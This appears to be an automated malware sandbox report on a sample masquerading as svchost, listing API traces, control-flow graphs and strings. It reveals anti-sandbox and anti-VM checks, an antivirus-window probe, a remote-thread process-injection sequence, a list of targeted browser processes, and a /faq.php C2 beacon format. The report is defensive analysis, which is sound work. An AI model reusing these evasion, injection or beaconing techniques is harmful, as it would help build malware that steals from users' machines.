                                                                                                                                                                                                              control_flow_graph 372 402d30-402d62 LoadLibraryA GetModuleFileNameA call 403a20 375 402d64-402d66 ExitProcess 372->375 376 402d6c-402d87 call 4021d0 call 4020e0 FindWindowA 372->376 381 402da1-402dbf call 402360 call 402450 call 402540 call 402680 IsUserAnAdmin 376->381 382 402d89-402d9b GetTickCount PostMessageA 376->382 391 402dc1-402dc8 call 401ea0 381->391 392 402de3-402dfb IsUserAnAdmin GetModuleHandleA 381->392 382->381 404 402dd2-402dd9 call 403560 391->404 405 402dca-402dcc ExitProcess 391->405 393 402e1c-402e20 392->393 394 402dfd-402e0d GetProcAddress 392->394 397 402e22-402e24 393->397 398 402e6e-402e70 393->398 394->393 396 402e0f-402e19 GetCurrentProcess 394->396 396->393 402 402e26-402e3a StrStrIA 397->402 403 402e3c-402e5a call 402930 GetCurrentProcessId call 401670 Sleep 397->403 400 402e76-402e8a StrStrIA 398->400 401 402efd-402f16 call 402930 GlobalFindAtomA 398->401 406 402ea1-402eb4 call 402a70 GlobalFindAtomA 400->406 407 402e8c-402e9c call 402930 call 4028d0 400->407 421 402f58-402f5a ExitProcess 401->421 422 402f18-402f27 GlobalAddAtomA IsUserAnAdmin 401->422 402->403 408 402e5f-402e69 call 402a70 call 4012b0 402->408 403->421 404->392 424 402ddb-402ddd ExitProcess 404->424 426 402ef6-402efb call 4012b0 406->426 427 402eb6-402ec5 GlobalAddAtomA IsUserAnAdmin 406->427 407->421 408->421 429 402f39-402f42 IsUserAnAdmin 422->429 430 402f29-402f31 422->430 426->421 434 402ed7-402ee0 IsUserAnAdmin 427->434 435 402ec7-402ecf 427->435 436 402f44 429->436 437 402f49-402f51 call 4015a0 429->437 430->429 441 402ee2 434->441 442 402ee7-402eef call 4015a0 434->442 435->434 436->437 437->421 446 402f53 call 401670 437->446 441->442 442->426 447 402ef1 call 401670 442->447 446->421 447->426
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • LoadLibraryA.KERNEL32(user32.dll), ref: 00402D41
                                                                                                                                                                                                              • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 00402D55
                                                                                                                                                                                                                • Part of subcall function 00403A20: RegOpenKeyExA.KERNEL32(80000002,HARDWARE\DESCRIPTION\System,00000000,00000101,?), ref: 00403A60
                                                                                                                                                                                                                • Part of subcall function 00403A20: RegQueryValueExA.KERNEL32(80000002,SystemBiosVersion,00000000,00000007,?,00000400), ref: 00403A85
                                                                                                                                                                                                                • Part of subcall function 00403A20: RegCloseKey.ADVAPI32(?), ref: 00403A93
                                                                                                                                                                                                                • Part of subcall function 00403A20: GetUserNameA.ADVAPI32(?,00000104), ref: 00403AD9
                                                                                                                                                                                                                • Part of subcall function 00403A20: CharUpperA.USER32(?), ref: 00403AE6
                                                                                                                                                                                                                • Part of subcall function 00403A20: strstr.MSVCRT ref: 00403AFE
                                                                                                                                                                                                                • Part of subcall function 00403A20: strstr.MSVCRT ref: 00403B17
                                                                                                                                                                                                                • Part of subcall function 00403A20: strstr.MSVCRT ref: 00403B30
                                                                                                                                                                                                                • Part of subcall function 00403A20: GetSystemWindowsDirectoryA.KERNEL32(?,00000104), ref: 00403B49
                                                                                                                                                                                                                • Part of subcall function 00403A20: GetVolumeInformationA.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00403B6D
                                                                                                                                                                                                                • Part of subcall function 00403A20: GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 00403BA7
                                                                                                                                                                                                              • ExitProcess.KERNEL32 ref: 00402D66
                                                                                                                                                                                                              • FindWindowA.USER32(____AVP.Root,00000000), ref: 00402D7D
                                                                                                                                                                                                              • GetTickCount.KERNEL32 ref: 00402D89
                                                                                                                                                                                                              • PostMessageA.USER32(00000000,00000466,00010001,00000000), ref: 00402D9B
                                                                                                                                                                                                              • IsUserAnAdmin.SHELL32 ref: 00402DBB
                                                                                                                                                                                                              • ExitProcess.KERNEL32 ref: 00402DCC
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.2972647321.0000000000400000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.2972647321.000000000045E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_400000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Namestrstr$ExitFileModuleProcessUser$AdminCharCloseCountDirectoryFindInformationLibraryLoadMessageOpenPostQuerySystemTickUpperValueVolumeWindowWindows
                                                                                                                                                                                                              • String ID: IsWow64Process$Pnv$Wed Jul 6 06:49:26 20112$\apppatch\$____AVP.Root$explorer.exe$kernel32.dll$user32.dll$winlogon.exe
                                                                                                                                                                                                              • API String ID: 3353599405-3115938722
                                                                                                                                                                                                              • Opcode ID: 21102898d184598221165a6fef4bec34bd79f3d1470297f61f252bfca23f0e31
                                                                                                                                                                                                              • Instruction ID: a3246fa232e6b5ad05535f44e20517c4174ab377f4a657e755d7089196f7c676
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 21102898d184598221165a6fef4bec34bd79f3d1470297f61f252bfca23f0e31
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 085161B0640212ABDB1077B1DF0EB5B3668AF90785F10413ABB05F51E1DBFC9D818AAD
                                                                                                                                                                                                              Function 02CA6970 Relevance: 49.3, APIs: 25, Strings: 3, Instructions: 261memorysleepfileCOMMON
                                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                              control_flow_graph 494 2ca6970-2ca69a3 memset call 2c932e0 497 2ca69a6-2ca69ab 494->497 497->497 498 2ca69ad-2ca69b7 497->498 499 2ca6c8f-2ca6c92 498->499 500 2ca69bd-2ca69d9 GetProcessHeap HeapAlloc 498->500 501 2ca6c8e 500->501 502 2ca69df-2ca69f2 memset GetTimeZoneInformation 500->502 501->499 503 2ca69f8-2ca69ff call 2ca4f80 502->503 506 2ca6a01-2ca6a13 Sleep call 2ca4f80 503->506 507 2ca6a15-2ca6a23 503->507 506->507 509 2ca6a2c-2ca6a3b IsUserAnAdmin 507->509 510 2ca6a25 507->510 512 2ca6a3d 509->512 513 2ca6a44-2ca6afa GetTickCount call 2cb5850 _snprintf GetTempPathA GetTempFileNameA SetFileAttributesA DeleteFileA 509->513 510->509 512->513 516 2ca6b00-2ca6b05 513->516 516->516 517 2ca6b07-2ca6b1e call 2c96c70 516->517 520 2ca6b89-2ca6ba8 call 2ca4ab0 517->520 521 2ca6b20-2ca6b22 517->521 527 2ca6bca-2ca6bdd call 2c974a0 520->527 528 2ca6baa-2ca6bc8 call 2ca4ab0 520->528 523 2ca6b2e-2ca6b30 521->523 524 2ca6b24-2ca6b2c 521->524 526 2ca6b32-2ca6b36 523->526 524->520 529 2ca6b38-2ca6b3a 526->529 530 2ca6b52-2ca6b54 526->530 542 2ca6bdf-2ca6bf8 call 2ca5ba0 GetProcessHeap HeapValidate 527->542 543 2ca6c06-2ca6c22 SetFileAttributesA DeleteFileA 527->543 528->527 541 2ca6c24-2ca6c2b call 2ca4f80 528->541 533 2ca6b4e-2ca6b50 529->533 534 2ca6b3c-2ca6b42 529->534 535 2ca6b57-2ca6b59 530->535 533->535 534->530 538 2ca6b44-2ca6b4c 534->538 539 2ca6b5b-2ca6b6f GetProcessHeap HeapValidate 535->539 540 2ca6b86 535->540 538->526 538->533 544 2ca6b7d-2ca6b80 539->544 545 2ca6b71-2ca6b77 GetProcessHeap HeapFree 539->545 540->520 548 2ca6c32-2ca6c46 call 2ca5af0 call 2c93420 541->548 552 2ca6c2d call 2c96de0 541->552 542->543 554 2ca6bfa-2ca6c00 GetProcessHeap HeapFree 542->554 543->548 544->540 545->544 558 2ca6c48-2ca6c5b 548->558 559 2ca6c82-2ca6c89 Sleep 548->559 552->548 554->543 560 2ca6c60-2ca6c67 Sleep call 2c93420 558->560 559->503 562 2ca6c6c-2ca6c6e 560->562 562->503 563 2ca6c74-2ca6c7b 562->563 563->560 564 2ca6c7d 563->564 564->503
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • memset.MSVCRT ref: 02CA6991
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000008,-000000F0,?,00000000), ref: 02CA69C7
                                                                                                                                                                                                              • HeapAlloc.KERNEL32(00000000,?,00000000), ref: 02CA69CE
                                                                                                                                                                                                              • memset.MSVCRT ref: 02CA69E3
                                                                                                                                                                                                              • GetTimeZoneInformation.KERNEL32(00000000,?,?,00000000), ref: 02CA69F2
                                                                                                                                                                                                              • Sleep.KERNEL32(000001F4), ref: 02CA6A06
                                                                                                                                                                                                              • IsUserAnAdmin.SHELL32 ref: 02CA6A2C
                                                                                                                                                                                                              • GetTickCount.KERNEL32 ref: 02CA6A6A
                                                                                                                                                                                                              • _snprintf.MSVCRT ref: 02CA6AA6
                                                                                                                                                                                                              • GetTempPathA.KERNEL32(00000104,?), ref: 02CA6ABB
                                                                                                                                                                                                              • GetTempFileNameA.KERNEL32(?,00000000,00000000,?), ref: 02CA6AD3
                                                                                                                                                                                                              • SetFileAttributesA.KERNEL32(?,00000000), ref: 02CA6AE2
                                                                                                                                                                                                              • DeleteFileA.KERNEL32(?), ref: 02CA6AEF
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000), ref: 02CA6B64
                                                                                                                                                                                                              • HeapValidate.KERNEL32(00000000), ref: 02CA6B67
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000), ref: 02CA6B74
                                                                                                                                                                                                              • HeapFree.KERNEL32(00000000), ref: 02CA6B77
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000,00000000,00000001,00000001,/faq.php,?,00000001,?,02CD96FC,00000001,00000000,00000000,/faq.php,?,00000001), ref: 02CA6BED
                                                                                                                                                                                                              • HeapValidate.KERNEL32(00000000), ref: 02CA6BF0
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000), ref: 02CA6BFD
                                                                                                                                                                                                              • HeapFree.KERNEL32(00000000), ref: 02CA6C00
                                                                                                                                                                                                              • SetFileAttributesA.KERNEL32(?,00000000,00000000,00000001,00000000,/faq.php,?,00000001,?,?,00000001,00000000), ref: 02CA6C0F
                                                                                                                                                                                                              • DeleteFileA.KERNEL32(?), ref: 02CA6C1C
                                                                                                                                                                                                              • Sleep.KERNEL32(?,00000001,/faq.php,?,00000001,?,02CD96FC,00000001,00000000,00000000,/faq.php,?,00000001,?,02CD96FC,00000001), ref: 02CA6C61
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.2976326837.0000000002C90000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CEE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_2c90000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Heap$FileProcess$AttributesDeleteFreeSleepTempValidatememset$AdminAllocCountInformationNamePathTickTimeUserZone_snprintf
                                                                                                                                                                                                              • String ID: %2b$/faq.php$id=%s&ver=4.1.2&up=%u&os=%03u&rights=%s&ltime=%s%d&token=%d
                                                                                                                                                                                                              • API String ID: 889229162-4291654836
                                                                                                                                                                                                              • Opcode ID: 15c2b71729903db945274da305cc16cbd751290174b323a6f2e0c4f72a555b3d
                                                                                                                                                                                                              • Instruction ID: 35aca6b5f66ff828b355aa3a6c2e49cfa9caec3dc76638900a7b33a0e997cf89
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 15c2b71729903db945274da305cc16cbd751290174b323a6f2e0c4f72a555b3d
                                                                                                                                                                                                              • Instruction Fuzzy Hash: EA810A71A81206ABDF249B749D59FEE7B7DEB44348F584650E905EB280EB70DE04CBA0
                                                                                                                                                                                                              Function 00403A20 Relevance: 47.4, APIs: 15, Strings: 12, Instructions: 134registrystringCOMMON
                                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                              control_flow_graph 664 403a20-403a68 RegOpenKeyExA 665 403a6a-403a8d RegQueryValueExA 664->665 666 403acd-403b05 GetUserNameA CharUpperA strstr 664->666 669 403a9b-403aac RegCloseKey 665->669 670 403a8f-403a99 RegCloseKey 665->670 667 403beb 666->667 668 403b0b-403b1e strstr 666->668 671 403bec-403bf2 667->671 668->667 673 403b24-403b37 strstr 668->673 669->666 672 403aae-403ab5 669->672 670->666 672->666 674 403ab7-403abe 672->674 673->667 675 403b3d-403b7b GetSystemWindowsDirectoryA GetVolumeInformationA 673->675 674->666 676 403ac0-403ac7 674->676 675->667 677 403b7d-403b82 675->677 676->666 676->671 677->667 678 403b84-403b89 677->678 678->667 679 403b8b-403b90 678->679 679->667 680 403b92-403b97 679->680 680->667 681 403b99-403bc3 GetModuleFileNameA StrStrIA 680->681 681->667 682 403bc5-403bd5 StrStrIA 681->682 682->667 683 403bd7-403be7 StrStrIA 682->683 683->667 684 403be9 683->684 684->667
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • RegOpenKeyExA.KERNEL32(80000002,HARDWARE\DESCRIPTION\System,00000000,00000101,?), ref: 00403A60
                                                                                                                                                                                                              • RegQueryValueExA.KERNEL32(80000002,SystemBiosVersion,00000000,00000007,?,00000400), ref: 00403A85
                                                                                                                                                                                                              • RegCloseKey.ADVAPI32(?), ref: 00403A93
                                                                                                                                                                                                              • RegCloseKey.ADVAPI32(?), ref: 00403A9F
                                                                                                                                                                                                              • GetUserNameA.ADVAPI32(?,00000104), ref: 00403AD9
                                                                                                                                                                                                              • CharUpperA.USER32(?), ref: 00403AE6
                                                                                                                                                                                                              • strstr.MSVCRT ref: 00403AFE
                                                                                                                                                                                                              • strstr.MSVCRT ref: 00403B17
                                                                                                                                                                                                              • strstr.MSVCRT ref: 00403B30
                                                                                                                                                                                                              • GetSystemWindowsDirectoryA.KERNEL32(?,00000104), ref: 00403B49
                                                                                                                                                                                                              • GetVolumeInformationA.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00403B6D
                                                                                                                                                                                                              • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 00403BA7
                                                                                                                                                                                                              • StrStrIA.SHLWAPI(?,\sand-box\), ref: 00403BBF
                                                                                                                                                                                                              • StrStrIA.SHLWAPI(?,\cwsandbox\), ref: 00403BD1
                                                                                                                                                                                                              • StrStrIA.SHLWAPI(?,\sandbox\), ref: 00403BE3
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.2972647321.0000000000400000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.2972647321.000000000045E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_400000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: strstr$CloseName$CharDirectoryFileInformationModuleOpenQuerySystemUpperUserValueVolumeWindows
                                                                                                                                                                                                              • String ID: E$HARDWARE\DESCRIPTION\System$M$MALNETVM$Q$SANDBOX$SystemBiosVersion$U$VIRUSCLONE$\cwsandbox\$\sand-box\$\sandbox\
                                                                                                                                                                                                              • API String ID: 1431998568-3499098167
                                                                                                                                                                                                              • Opcode ID: 3caa7bba4dd23b12010071394e2641878e1989dd699c05cb0f3a9ea1e275d5a5
                                                                                                                                                                                                              • Instruction ID: bae6937ecf4d77d63e68da0d133f8e08c9265e2213eddde9df9132157c3c9a9d
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 3caa7bba4dd23b12010071394e2641878e1989dd699c05cb0f3a9ea1e275d5a5
                                                                                                                                                                                                              • Instruction Fuzzy Hash: A841B8B1944218ABDB20DB54CD89FDF7B7C9B84705F1440AAE704B61C0D779AB448F98
                                                                                                                                                                                                              Function 02CA9E40 Relevance: 43.9, APIs: 23, Strings: 2, Instructions: 161threadnetworkCOMMON
                                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.2976326837.0000000002C90000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CEE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_2c90000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: ExitThread$Startupsocket
                                                                                                                                                                                                              • String ID: login$pass
                                                                                                                                                                                                              • API String ID: 1705285421-2248183487
                                                                                                                                                                                                              • Opcode ID: 0dfd243983769156703f64627744f35ec7acf3266e33c8991ce96a385960b764
                                                                                                                                                                                                              • Instruction ID: 9df81b599355c341ab1bc18663c8d8b2592bc7e176aac3278e110aa146cefb22
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 0dfd243983769156703f64627744f35ec7acf3266e33c8991ce96a385960b764
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 21519B35949301AFC310DF64D889B6ABBF5BB88765F808B0DF966C72C0E7709514CBA2
                                                                                                                                                                                                              Function 02CA79D0 Relevance: 40.8, APIs: 27, Instructions: 286memorytimesleepCOMMON
                                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                              control_flow_graph 706 2ca79d0-2ca79df 707 2ca79e1-2ca79ec call 2ca78a0 706->707 710 2ca79f2-2ca79fa 707->710 711 2ca7db3-2ca7dbb Sleep 707->711 712 2ca7a00-2ca7a3e OpenProcess 710->712 713 2ca7ae6 710->713 711->707 714 2ca7a9a-2ca7aa9 EnterCriticalSection 712->714 715 2ca7a40-2ca7a60 GetProcessTimes 712->715 716 2ca7aea-2ca7b35 OpenProcess 713->716 721 2ca7ab0-2ca7ab7 714->721 717 2ca7a62-2ca7a6e 715->717 718 2ca7a70-2ca7a74 715->718 719 2ca7b88-2ca7b99 EnterCriticalSection 716->719 720 2ca7b37-2ca7b54 GetProcessTimes 716->720 722 2ca7a78-2ca7a8a GetHandleInformation 717->722 718->722 725 2ca7b9b 719->725 726 2ca7bb3-2ca7c63 LeaveCriticalSection VirtualQuery * 2 719->726 723 2ca7b62 720->723 724 2ca7b56-2ca7b60 720->724 727 2ca7ad8 721->727 728 2ca7ab9-2ca7abd 721->728 722->714 730 2ca7a8c-2ca7a91 722->730 729 2ca7b66-2ca7b78 GetHandleInformation 723->729 724->729 731 2ca7ba0-2ca7ba7 725->731 733 2ca7c65-2ca7c7c call 2cb4cc0 726->733 734 2ca7ada-2ca7adc 727->734 728->721 732 2ca7abf-2ca7ad6 LeaveCriticalSection call 2ca7810 728->732 729->719 735 2ca7b7a-2ca7b7f 729->735 730->714 736 2ca7a93-2ca7a94 CloseHandle 730->736 737 2ca7d6f-2ca7d7b 731->737 738 2ca7bad-2ca7bb1 731->738 732->734 747 2ca7c7e-2ca7c82 733->747 748 2ca7c84-2ca7cab EnterCriticalSection GetProcessHeap HeapAlloc 733->748 734->712 741 2ca7ae2 734->741 735->719 742 2ca7b81-2ca7b82 CloseHandle 735->742 736->714 737->716 743 2ca7d81 737->743 738->726 738->731 741->713 742->719 746 2ca7d85-2ca7d89 743->746 746->711 751 2ca7d8b-2ca7d9e GetProcessHeap HeapValidate 746->751 747->733 747->748 749 2ca7cb1-2ca7cf8 OpenProcess 748->749 750 2ca7d64-2ca7d69 LeaveCriticalSection 748->750 752 2ca7cfa-2ca7d17 GetProcessTimes 749->752 753 2ca7d4f-2ca7d5e 749->753 750->737 754 2ca7daf-2ca7db1 751->754 755 2ca7da0-2ca7da9 GetProcessHeap HeapFree 751->755 756 2ca7d19-2ca7d23 752->756 757 2ca7d25 752->757 753->750 754->711 754->746 755->754 758 2ca7d29-2ca7d3f GetHandleInformation 756->758 757->758 758->753 759 2ca7d41-2ca7d46 758->759 759->753 760 2ca7d48-2ca7d49 CloseHandle 759->760 760->753
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                • Part of subcall function 02CA78A0: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 02CA78B4
                                                                                                                                                                                                                • Part of subcall function 02CA78A0: Process32First.KERNEL32(00000000,?), ref: 02CA78D9
                                                                                                                                                                                                                • Part of subcall function 02CA78A0: GetCurrentProcessId.KERNEL32(?,00000000), ref: 02CA78FD
                                                                                                                                                                                                                • Part of subcall function 02CA78A0: StrStrIA.SHLWAPI(iexplore.exe|opera.exe|java.exe|javaw.exe|explorer.exe|isclient.exe|intpro.exe|ipc_full.exe|mnp.exe|cbsmain.dll|firefox.exe|clmain.exe|core.exe|maxthon.exe|avant.exe|safari.exe|svchost.exe|chrome.exe|notepad.exe|rundll32.exe|netscape.exe|tbb-firefox.exe|frd.ex,?,?,00000000), ref: 02CA7917
                                                                                                                                                                                                                • Part of subcall function 02CA78A0: EnterCriticalSection.KERNEL32(02CDFB80,?,00000000), ref: 02CA793B
                                                                                                                                                                                                                • Part of subcall function 02CA78A0: GetProcessHeap.KERNEL32(00000008,00000010,?,00000000), ref: 02CA7941
                                                                                                                                                                                                                • Part of subcall function 02CA78A0: HeapAlloc.KERNEL32(00000000,?,00000000), ref: 02CA7948
                                                                                                                                                                                                                • Part of subcall function 02CA78A0: LeaveCriticalSection.KERNEL32(02CDFB80,?,00000000), ref: 02CA7977
                                                                                                                                                                                                                • Part of subcall function 02CA78A0: Process32Next.KERNEL32(00000000,00000128), ref: 02CA798B
                                                                                                                                                                                                                • Part of subcall function 02CA78A0: GetHandleInformation.KERNEL32(00000000,?,?,00000000), ref: 02CA79A5
                                                                                                                                                                                                                • Part of subcall function 02CA78A0: CloseHandle.KERNEL32(00000000,?,00000000), ref: 02CA79B6
                                                                                                                                                                                                              • OpenProcess.KERNEL32(00000400,00000000,000002F0), ref: 02CA7A34
                                                                                                                                                                                                              • GetProcessTimes.KERNEL32(00000000,?,?,?,?), ref: 02CA7A58
                                                                                                                                                                                                              • GetHandleInformation.KERNEL32(00000000,?), ref: 02CA7A82
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 02CA7A94
                                                                                                                                                                                                              • EnterCriticalSection.KERNEL32(02CDFB80), ref: 02CA7A9F
                                                                                                                                                                                                              • LeaveCriticalSection.KERNEL32(02CDFB80), ref: 02CA7AC4
                                                                                                                                                                                                              • OpenProcess.KERNEL32(00000400,00000000,?), ref: 02CA7B2B
                                                                                                                                                                                                              • GetProcessTimes.KERNEL32(00000000,?,?,?,?), ref: 02CA7B4C
                                                                                                                                                                                                              • GetHandleInformation.KERNEL32(00000000,?), ref: 02CA7B70
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 02CA7B82
                                                                                                                                                                                                              • EnterCriticalSection.KERNEL32(02CDFB80), ref: 02CA7B8D
                                                                                                                                                                                                              • LeaveCriticalSection.KERNEL32(02CDFB80), ref: 02CA7BB8
                                                                                                                                                                                                              • VirtualQuery.KERNEL32(02CB5460,?,0000001C), ref: 02CA7C06
                                                                                                                                                                                                              • VirtualQuery.KERNEL32(02CB5460,?,0000001C), ref: 02CA7C51
                                                                                                                                                                                                              • EnterCriticalSection.KERNEL32(02CDFB80,?,?), ref: 02CA7C90
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000008,00000010), ref: 02CA7C9A
                                                                                                                                                                                                              • HeapAlloc.KERNEL32(00000000), ref: 02CA7CA1
                                                                                                                                                                                                              • Sleep.KERNEL32(00000032), ref: 02CA7DB5
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.2976326837.0000000002C90000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CEE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_2c90000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: CriticalProcessSection$Handle$EnterHeap$CloseInformationLeave$AllocOpenProcess32QueryTimesVirtual$CreateCurrentFirstNextSleepSnapshotToolhelp32
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 87146162-0
                                                                                                                                                                                                              • Opcode ID: 25e54bad8f244bcd8aee1b8d41fd38d02e0d3d31f6d357ea5f87370fd2d03b53
                                                                                                                                                                                                              • Instruction ID: 56f23cf807f7c7b40a9320cf70c9712494d88e7e7c8ec15c1b2a9fd0174efe98
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 25e54bad8f244bcd8aee1b8d41fd38d02e0d3d31f6d357ea5f87370fd2d03b53
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 59C1E6B1A49351AFD320CF65C894A6FFBE8BB88B54F54891EF58AC7240D7709508CF92
                                                                                                                                                                                                              Function 00401670 Relevance: 40.5, APIs: 21, Strings: 2, Instructions: 215injectionlibrarymemoryCOMMON
                                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                              control_flow_graph 761 401670-401680 762 401686-40168e 761->762 763 4018d8-4018dc 761->763 764 401690-401699 call 401cf0 762->764 767 4016a5-4016ae call 401cf0 764->767 768 40169b-4016a3 Sleep 764->768 771 4018d3-4018d7 767->771 772 4016b4-4016c9 OpenProcess 767->772 768->764 768->767 771->763 772->771 773 4016cf-4016e9 GetModuleHandleA 772->773 774 401706-40170a 773->774 775 4016eb-4016f7 GetProcAddress 773->775 777 40170c-401720 GetModuleHandleA 774->777 778 40173f-40177c VirtualAllocEx 774->778 775->774 776 4016f9-401703 GetCurrentProcess 775->776 776->774 779 401722-40172c GetProcAddress 777->779 780 401735-401739 777->780 781 4018b0-4018c4 GetHandleInformation 778->781 782 401782-4017ac WriteProcessMemory 778->782 779->780 783 40172e-401732 779->783 780->778 780->781 781->771 784 4018c6-4018ca 781->784 785 4017ae 782->785 786 40181f-401860 WriteProcessMemory FlushInstructionCache CreateRemoteThread 782->786 783->780 784->771 787 4018cc-4018cd CloseHandle 784->787 788 4017b1-4017c7 VirtualAlloc 785->788 789 401862-401876 GetHandleInformation 786->789 790 40188e-4018ad RtlCreateUserThread 786->790 787->771 791 401807-401817 788->791 792 4017c9-401801 memcpy WriteProcessMemory VirtualFree 788->792 793 401885-40188c 789->793 794 401878-40187c 789->794 790->781 791->788 795 401819-40181c 791->795 792->791 793->781 794->793 796 40187e-40187f CloseHandle 794->796 795->786 796->793
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                • Part of subcall function 00401CF0: memset.MSVCRT ref: 00401D16
                                                                                                                                                                                                                • Part of subcall function 00401CF0: CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 00401D27
                                                                                                                                                                                                                • Part of subcall function 00401CF0: GetLastError.KERNEL32 ref: 00401D30
                                                                                                                                                                                                                • Part of subcall function 00401CF0: SwitchToThread.KERNEL32 ref: 00401D3F
                                                                                                                                                                                                                • Part of subcall function 00401CF0: CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 00401D48
                                                                                                                                                                                                                • Part of subcall function 00401CF0: GetHandleInformation.KERNEL32(00000000,00000000), ref: 00401D68
                                                                                                                                                                                                                • Part of subcall function 00401CF0: FindCloseChangeNotification.KERNEL32(00000000), ref: 00401D79
                                                                                                                                                                                                              • Sleep.KERNEL32(00000064,00000000,?,7604DB30,00402F58,winlogon.exe), ref: 0040169D
                                                                                                                                                                                                              • OpenProcess.KERNEL32(001F0FFF,00000000,00000000,00000000,?,7604DB30,00402F58,winlogon.exe), ref: 004016BC
                                                                                                                                                                                                              • GetModuleHandleA.KERNEL32(kernel32.dll), ref: 004016DB
                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,IsWow64Process), ref: 004016F1
                                                                                                                                                                                                              • GetCurrentProcess.KERNEL32(00000000), ref: 004016FD
                                                                                                                                                                                                              • GetModuleHandleA.KERNEL32(kernel32.dll), ref: 00401718
                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,IsWow64Process), ref: 00401728
